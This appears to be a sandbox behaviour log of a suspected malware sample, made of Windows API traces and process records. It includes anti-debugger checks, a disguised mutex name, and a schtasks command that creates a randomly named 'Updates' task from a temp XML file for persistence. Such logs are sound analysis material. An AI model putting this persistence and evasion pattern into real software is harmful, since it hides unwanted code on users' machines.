[0184.060] CreateMutexW (lpMutexAttributes=0x24b0ffc, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0xaf28 [0184.060] WaitForSingleObject (hHandle=0xaf28, dwMilliseconds=0x1f4) returned 0x0 [0184.060] ReleaseMutex (hMutex=0xaf28) returned 1 [0184.060] CloseHandle (hObject=0xaf28) returned 1 [0184.060] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x24b1218, cbSid=0x448f74c | out: pSid=0x24b1218*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x448f74c) returned 1 [0184.060] CreateMutexW (lpMutexAttributes=0x24b12f4, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0xaf28 [0184.060] WaitForSingleObject (hHandle=0xaf28, dwMilliseconds=0x1f4) returned 0x0 [0184.060] ReleaseMutex (hMutex=0xaf28) returned 1 [0184.061] CloseHandle (hObject=0xaf28) returned 1 [0184.061] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x24b1510, cbSid=0x448f74c | out: pSid=0x24b1510*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x448f74c) returned 1 [0184.061] CreateMutexW (lpMutexAttributes=0x24b15ec, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0xaf28 [0184.061] WaitForSingleObject (hHandle=0xaf28, dwMilliseconds=0x1f4) returned 0x0 [0184.061] ReleaseMutex (hMutex=0xaf28) returned 1 [0184.061] CloseHandle (hObject=0xaf28) returned 1 [0184.061] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x24b1808, cbSid=0x448f74c | out: pSid=0x24b1808*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x448f74c) returned 1 [0184.061] CreateMutexW (lpMutexAttributes=0x24b18e4, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0xaf28 [0184.061] WaitForSingleObject (hHandle=0xaf28, dwMilliseconds=0x1f4) returned 0x0 [0184.061] ReleaseMutex (hMutex=0xaf28) returned 1 [0184.061] CloseHandle (hObject=0xaf28) returned 1 [0184.062] EtwEventUnregister () returned 0x0 [0184.069] GdipDeleteFont (font=0x5802940) returned 0x0 [0184.071] CloseHandle (hObject=0x328) returned 1 [0184.073] GdipDisposeImage (image=0x57afcf0) returned 0x0 [0184.081] CloseHandle (hObject=0x46fc) returned 1 [0184.081] UnmapViewOfFile (lpBaseAddress=0x3b0000) returned 1 [0184.100] CloseHandle (hObject=0x2c8) returned 1 [0184.101] RegCloseKey (hKey=0x80000004) returned 0x0 [0184.101] CloseHandle (hObject=0x34d8) returned 1 [0184.101] CloseHandle (hObject=0x52c4) returned 1 [0184.102] CloseHandle (hObject=0x12204) returned 1 [0184.105] SleepEx (dwMilliseconds=0xffffffff, bAlertable=0) Thread: id = 150 os_tid = 0x5d8 Thread: id = 153 os_tid = 0x130 Thread: id = 154 os_tid = 0x1d8 Thread: id = 155 os_tid = 0x230 Thread: id = 156 os_tid = 0x21c [0159.432] CoGetContextToken (in: pToken=0x430f9bc | out: pToken=0x430f9bc) returned 0x0 [0159.432] CObjectContext::QueryInterface () returned 0x0 [0159.432] CObjectContext::GetCurrentThreadType () returned 0x0 [0159.433] Release () returned 0x0 [0159.433] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0159.433] SleepEx (dwMilliseconds=0xffffffff, bAlertable=1) returned 0xc0 [0159.433] SleepEx (dwMilliseconds=0x3a980, bAlertable=1) returned 0x0 [0169.783] SleepEx (dwMilliseconds=0x38138, bAlertable=1) returned 0x0 [0180.937] SleepEx (dwMilliseconds=0x3577a, bAlertable=1) Thread: id = 157 os_tid = 0x1c4 Thread: id = 178 os_tid = 0x560 Thread: id = 179 os_tid = 0x608 [0182.493] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0182.623] SleepEx (dwMilliseconds=0x1f4, bAlertable=1) returned 0x0 [0183.176] IsDebuggerPresent () returned 0 [0183.176] GetCurrentProcessId () returned 0x678 [0183.176] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0xad8c [0183.176] GetExitCodeProcess (in: hProcess=0xad8c, lpExitCode=0x2483f54 | out: lpExitCode=0x2483f54*=0x103) returned 1 [0183.176] CloseHandle (hObject=0xad8c) returned 1 [0183.177] OutputDebugStringW (lpOutputString="") [0183.177] CloseHandle (hObject=0x0) returned 0 [0183.177] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) Thread: id = 180 os_tid = 0x5fc [0182.600] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0182.607] IsDebuggerPresent () returned 0 [0182.607] GetCurrentProcessId () returned 0x678 [0182.607] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x11dac [0182.607] GetExitCodeProcess (in: hProcess=0x11dac, lpExitCode=0x2477ec0 | out: lpExitCode=0x2477ec0*=0x103) returned 1 [0182.608] CloseHandle (hObject=0x11dac) returned 1 [0182.615] OutputDebugStringW (lpOutputString="") [0182.622] CloseHandle (hObject=0x0) returned 0 [0182.623] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0183.676] IsDebuggerPresent () returned 0 [0183.676] GetCurrentProcessId () returned 0x678 [0183.676] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0xc01c [0183.676] GetExitCodeProcess (in: hProcess=0xc01c, lpExitCode=0x249adcc | out: lpExitCode=0x249adcc*=0x103) returned 1 [0183.714] CloseHandle (hObject=0xc01c) returned 1 [0183.714] OutputDebugStringW (lpOutputString="") [0183.714] CloseHandle (hObject=0x0) returned 0 [0183.714] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) Thread: id = 181 os_tid = 0x58c Thread: id = 185 os_tid = 0x4cc [0183.983] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0183.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x34479a8, Length=0x20000, ResultLength=0xbc9f234 | out: SystemInformation=0x34479a8, ResultLength=0xbc9f234*=0x7f08) returned 0x0 [0184.003] SleepEx (dwMilliseconds=0x7d0, bAlertable=1) Thread: id = 186 os_tid = 0x56c Process: id = "10" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x9e1d000" os_pid = "0x374" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "8" os_parent_pid = "0x1cc" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cf6c" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 39 os_tid = 0x434 Thread: id = 40 os_tid = 0x438 Thread: id = 41 os_tid = 0x554 Thread: id = 42 os_tid = 0x4e0 Thread: id = 43 os_tid = 0x4d8 Thread: id = 44 os_tid = 0x4a8 Thread: id = 45 os_tid = 0x48c Thread: id = 46 os_tid = 0x484 Thread: id = 47 os_tid = 0x120 Thread: id = 48 os_tid = 0x118 Thread: id = 49 os_tid = 0xf0 Thread: id = 50 os_tid = 0x3f0 Thread: id = 51 os_tid = 0x3ec Thread: id = 52 os_tid = 0x394 Thread: id = 53 os_tid = 0x390 Thread: id = 54 os_tid = 0x38c Thread: id = 55 os_tid = 0x388 Thread: id = 56 os_tid = 0x380 Thread: id = 57 os_tid = 0x378 Thread: id = 58 os_tid = 0x738 Thread: id = 60 os_tid = 0x74c Thread: id = 61 os_tid = 0x750 Thread: id = 62 os_tid = 0x754 Thread: id = 63 os_tid = 0x758 Thread: id = 64 os_tid = 0x75c Thread: id = 65 os_tid = 0x764 Thread: id = 66 os_tid = 0x768 Thread: id = 67 os_tid = 0x76c Thread: id = 68 os_tid = 0x770 Thread: id = 69 os_tid = 0x774 Thread: id = 70 os_tid = 0x778 Thread: id = 71 os_tid = 0x780 Thread: id = 72 os_tid = 0x788 Thread: id = 73 os_tid = 0x790 Thread: id = 74 os_tid = 0x7a0 Thread: id = 75 os_tid = 0x7a4 Thread: id = 76 os_tid = 0x7a8 Thread: id = 77 os_tid = 0x7ac Thread: id = 78 os_tid = 0x7c0 Thread: id = 79 os_tid = 0x7e0 Thread: id = 96 os_tid = 0x40c Thread: id = 97 os_tid = 0x47c Thread: id = 98 os_tid = 0x460 Thread: id = 99 os_tid = 0x3d8 Thread: id = 105 os_tid = 0x528 Thread: id = 110 os_tid = 0x4ec Thread: id = 207 os_tid = 0x360 Thread: id = 208 os_tid = 0x688 Thread: id = 211 os_tid = 0x7b0 Thread: id = 212 os_tid = 0x3a8 Thread: id = 213 os_tid = 0x7c4 Thread: id = 214 os_tid = 0x4d0 Thread: id = 215 os_tid = 0x768 Thread: id = 216 os_tid = 0x274 Thread: id = 217 os_tid = 0x74c Thread: id = 218 os_tid = 0x32c Thread: id = 219 os_tid = 0x230 Thread: id = 220 os_tid = 0x58c Thread: id = 221 os_tid = 0x314 Thread: id = 222 os_tid = 0x5b4 Thread: id = 226 os_tid = 0x184 Thread: id = 230 os_tid = 0x734 Thread: id = 231 os_tid = 0x604 Thread: id = 232 os_tid = 0x3b8 Thread: id = 233 os_tid = 0x320 Thread: id = 234 os_tid = 0x644 Thread: id = 235 os_tid = 0x64 Thread: id = 236 os_tid = 0x310 Thread: id = 237 os_tid = 0x6f0 Thread: id = 238 os_tid = 0x71c Thread: id = 261 os_tid = 0x4f8 Thread: id = 262 os_tid = 0x228 Process: id = "11" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x18fc2000" os_pid = "0x254" os_integrity_level = "0x4000" os_privileges = "0x60b00080" monitor_reason = "rpc_server" parent_id = "10" os_parent_pid = "0x1cc" cmd_line = "C:\\Windows\\system32\\svchost.exe -k DcomLaunch" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\DcomLaunch" [0xa], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT AUTHORITY\\Logon Session 00000000:00006e7f" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 80 os_tid = 0x760 Thread: id = 81 os_tid = 0x744 Thread: id = 82 os_tid = 0x740 Thread: id = 83 os_tid = 0x31c Thread: id = 84 os_tid = 0x2ac Thread: id = 85 os_tid = 0x2a4 Thread: id = 86 os_tid = 0x2a0 Thread: id = 87 os_tid = 0x288 Thread: id = 88 os_tid = 0x284 Thread: id = 89 os_tid = 0x280 Thread: id = 90 os_tid = 0x27c Thread: id = 91 os_tid = 0x278 Thread: id = 92 os_tid = 0x26c Thread: id = 93 os_tid = 0x264 Thread: id = 94 os_tid = 0x260 Thread: id = 95 os_tid = 0x258 Thread: id = 227 os_tid = 0x2d0 Thread: id = 229 os_tid = 0x35c Process: id = "12" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x72060000" os_pid = "0x49c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0x254" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e51c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 103 os_tid = 0x4e4 Thread: id = 104 os_tid = 0x4c0 Thread: id = 106 os_tid = 0x504 Thread: id = 107 os_tid = 0x4dc Thread: id = 108 os_tid = 0x508 Thread: id = 109 os_tid = 0x4f0 Thread: id = 111 os_tid = 0x4cc Process: id = "13" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x76c4000" os_pid = "0x370" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "12" os_parent_pid = "0x30c" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e51c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 112 os_tid = 0x730 Thread: id = 113 os_tid = 0x6fc Thread: id = 114 os_tid = 0x6f0 Thread: id = 115 os_tid = 0x6ec Thread: id = 116 os_tid = 0x6c8 Thread: id = 117 os_tid = 0x6ac Thread: id = 118 os_tid = 0x680 Thread: id = 119 os_tid = 0x664 Thread: id = 120 os_tid = 0x62c Thread: id = 121 os_tid = 0x618 Thread: id = 122 os_tid = 0x5d4 Thread: id = 123 os_tid = 0x58c Thread: id = 124 os_tid = 0x564 Thread: id = 125 os_tid = 0x558 Thread: id = 126 os_tid = 0x548 Thread: id = 127 os_tid = 0x540 Thread: id = 128 os_tid = 0x4f4 Thread: id = 129 os_tid = 0x4e8 Thread: id = 130 os_tid = 0x4bc Thread: id = 131 os_tid = 0x4b8 Thread: id = 132 os_tid = 0x4b4 Thread: id = 133 os_tid = 0x4b0 Thread: id = 134 os_tid = 0x4a0 Thread: id = 135 os_tid = 0x49c Thread: id = 136 os_tid = 0x498 Thread: id = 137 os_tid = 0x494 Thread: id = 138 os_tid = 0x490 Thread: id = 139 os_tid = 0x3d8 Thread: id = 140 os_tid = 0x268 Thread: id = 141 os_tid = 0x174 Thread: id = 142 os_tid = 0x144 Thread: id = 143 os_tid = 0x150 Thread: id = 144 os_tid = 0x154 Thread: id = 145 os_tid = 0x3a4 Thread: id = 146 os_tid = 0x37c Thread: id = 147 os_tid = 0x4c8 Thread: id = 223 os_tid = 0x1d8 Thread: id = 228 os_tid = 0x210 Process: id = "14" image_name = "schtasks.exe" filename = "c:\\windows\\syswow64\\schtasks.exe" page_root = "0x6c07e000" os_pid = "0x63c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x530" cmd_line = "\"C:\\Windows\\SysWOW64\\schtasks.exe\" /Create /TN \"Updates\\ChFIQxtpqP\" /XML \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmpF047.tmp\"" cur_dir = "C:\\Windows\\SysWOW64\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e51c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 163 os_tid = 0x668 [0172.471] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x25f9ec | out: lpSystemTimeAsFileTime=0x25f9ec*(dwLowDateTime=0xb419b7b0, dwHighDateTime=0x1d6a092)) [0172.471] GetCurrentProcessId () returned 0x63c [0172.471] GetCurrentThreadId () returned 0x668 [0172.471] GetTickCount () returned 0x1139d1a [0172.471] RtlQueryPerformanceCounter () returned 0x1 [0172.472] GetModuleHandleA (lpModuleName=0x0) returned 0xcc0000 [0172.472] __set_app_type (_Type=0x1) [0172.472] __p__fmode () returned 0x768131f4 [0172.472] __p__commode () returned 0x768131fc [0172.473] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xcd7881) returned 0x0 [0172.473] __wgetmainargs (in: _Argc=0xce9e6c, _Argv=0xce9e74, _Env=0xce9e70, _DoWildCard=0, _StartInfo=0xce9e80 | out: _Argc=0xce9e6c, _Argv=0xce9e74, _Env=0xce9e70) returned 0 [0172.473] _onexit (_Func=0xce0fe2) returned 0xce0fe2 [0172.473] _onexit (_Func=0xce0ff3) returned 0xce0ff3 [0172.474] _onexit (_Func=0xce1002) returned 0xce1002 [0172.474] _onexit (_Func=0xce101e) returned 0xce101e [0172.474] _onexit (_Func=0xce103a) returned 0xce103a [0172.474] _onexit (_Func=0xce1056) returned 0xce1056 [0172.474] _onexit (_Func=0xce1072) returned 0xce1072 [0172.474] _onexit (_Func=0xce108e) returned 0xce108e [0172.475] _onexit (_Func=0xce10aa) returned 0xce10aa [0172.475] _onexit (_Func=0xce10c6) returned 0xce10c6 [0172.475] _onexit (_Func=0xce10e2) returned 0xce10e2 [0172.475] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0172.475] WinSqmIsOptedIn () returned 0x0 [0172.475] GetProcessHeap () returned 0x600000 [0172.475] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x10) returned 0x614bd8 [0172.476] SetLastError (dwErrCode=0x0) [0172.476] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0172.476] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0172.476] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0172.483] VerifyVersionInfoW (in: lpVersionInformation=0x25f464, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0x25f464) returned 1 [0172.484] GetProcessHeap () returned 0x600000 [0172.484] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x10) returned 0x614bf0 [0172.484] lstrlenW (lpString="") returned 0 [0172.484] GetProcessHeap () returned 0x600000 [0172.484] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x2) returned 0x613d20 [0172.484] GetProcessHeap () returned 0x600000 [0172.484] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x614fc0 [0172.484] GetProcessHeap () returned 0x600000 [0172.484] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x10) returned 0x614c08 [0172.484] GetProcessHeap () returned 0x600000 [0172.484] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x614fe0 [0172.484] GetProcessHeap () returned 0x600000 [0172.484] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x615000 [0172.484] GetProcessHeap () returned 0x600000 [0172.484] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x615020 [0172.484] GetProcessHeap () returned 0x600000 [0172.484] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x615040 [0172.484] GetProcessHeap () returned 0x600000 [0172.484] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x10) returned 0x614c20 [0172.484] GetProcessHeap () returned 0x600000 [0172.484] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x615060 [0172.484] GetProcessHeap () returned 0x600000 [0172.484] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x615080 [0172.484] GetProcessHeap () returned 0x600000 [0172.484] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x6150a0 [0172.484] GetProcessHeap () returned 0x600000 [0172.484] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x6150c0 [0172.484] GetProcessHeap () returned 0x600000 [0172.484] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x10) returned 0x614c38 [0172.485] GetProcessHeap () returned 0x600000 [0172.485] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x6150e0 [0172.485] GetProcessHeap () returned 0x600000 [0172.485] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x615118 [0172.485] GetProcessHeap () returned 0x600000 [0172.485] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x615138 [0172.485] GetProcessHeap () returned 0x600000 [0172.485] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x615158 [0172.485] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.485] SetLastError (dwErrCode=0x0) [0172.486] GetProcessHeap () returned 0x600000 [0172.486] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x615178 [0172.486] GetProcessHeap () returned 0x600000 [0172.486] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x615198 [0172.486] GetProcessHeap () returned 0x600000 [0172.486] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x6151b8 [0172.486] GetProcessHeap () returned 0x600000 [0172.486] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x6151d8 [0172.486] GetProcessHeap () returned 0x600000 [0172.486] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x6151f8 [0172.486] GetProcessHeap () returned 0x600000 [0172.486] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x10) returned 0x614c50 [0172.486] _memicmp (_Buf1=0x614c50, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.499] GetProcessHeap () returned 0x600000 [0172.499] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x208) returned 0x615a80 [0172.499] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x615a80, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0172.499] LoadLibraryExA (lpLibFileName="VERSION.dll", hFile=0x0, dwFlags=0x0) returned 0x74a00000 [0172.502] GetProcAddress (hModule=0x74a00000, lpProcName="GetFileVersionInfoSizeW") returned 0x74a019d9 [0172.502] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744 [0172.502] GetProcessHeap () returned 0x600000 [0172.502] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x74e) returned 0x615c90 [0172.502] GetProcAddress (hModule=0x74a00000, lpProcName="GetFileVersionInfoW") returned 0x74a019f4 [0172.502] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x615c90 | out: lpData=0x615c90) returned 1 [0172.503] GetProcAddress (hModule=0x74a00000, lpProcName="VerQueryValueW") returned 0x74a01b51 [0172.503] VerQueryValueW (in: pBlock=0x615c90, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x25f56c, puLen=0x25f570 | out: lplpBuffer=0x25f56c*=0x61602c, puLen=0x25f570) returned 1 [0172.504] _memicmp (_Buf1=0x614c50, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.504] _vsnwprintf (in: _Buffer=0x615a80, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x25f554 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0172.504] VerQueryValueW (in: pBlock=0x615c90, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x25f57c, puLen=0x25f578 | out: lplpBuffer=0x25f57c*=0x615e58, puLen=0x25f578) returned 1 [0172.504] lstrlenW (lpString="schtasks.exe") returned 12 [0172.504] lstrlenW (lpString="schtasks.exe") returned 12 [0172.504] lstrlenW (lpString=".EXE") returned 4 [0172.504] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0172.505] lstrlenW (lpString="schtasks.exe") returned 12 [0172.505] lstrlenW (lpString=".EXE") returned 4 [0172.505] _memicmp (_Buf1=0x614c50, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.505] lstrlenW (lpString="schtasks") returned 8 [0172.505] GetProcessHeap () returned 0x600000 [0172.505] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x615238 [0172.505] GetProcessHeap () returned 0x600000 [0172.505] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x615258 [0172.506] GetProcessHeap () returned 0x600000 [0172.506] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x615278 [0172.506] GetProcessHeap () returned 0x600000 [0172.506] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x615298 [0172.506] GetProcessHeap () returned 0x600000 [0172.506] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x10) returned 0x614cb0 [0172.506] _memicmp (_Buf1=0x614cb0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.506] GetProcessHeap () returned 0x600000 [0172.506] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0xa0) returned 0x616670 [0172.506] GetProcessHeap () returned 0x600000 [0172.506] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x6152b8 [0172.506] GetProcessHeap () returned 0x600000 [0172.506] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x6152d8 [0172.506] GetProcessHeap () returned 0x600000 [0172.506] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x6152f8 [0172.506] GetProcessHeap () returned 0x600000 [0172.506] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x10) returned 0x614cc8 [0172.506] _memicmp (_Buf1=0x614cc8, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.506] GetProcessHeap () returned 0x600000 [0172.506] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x200) returned 0x616718 [0172.506] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x616718, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0172.506] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0172.507] GetProcessHeap () returned 0x600000 [0172.507] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x30) returned 0x616920 [0172.507] _vsnwprintf (in: _Buffer=0x616670, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x25f558 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29 [0172.507] GetProcessHeap () returned 0x600000 [0172.507] GetProcessHeap () returned 0x600000 [0172.507] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x615c90) returned 1 [0172.507] GetProcessHeap () returned 0x600000 [0172.507] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x615c90) returned 0x74e [0172.507] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615c90 | out: hHeap=0x600000) returned 1 [0172.507] SetLastError (dwErrCode=0x0) [0172.507] GetThreadLocale () returned 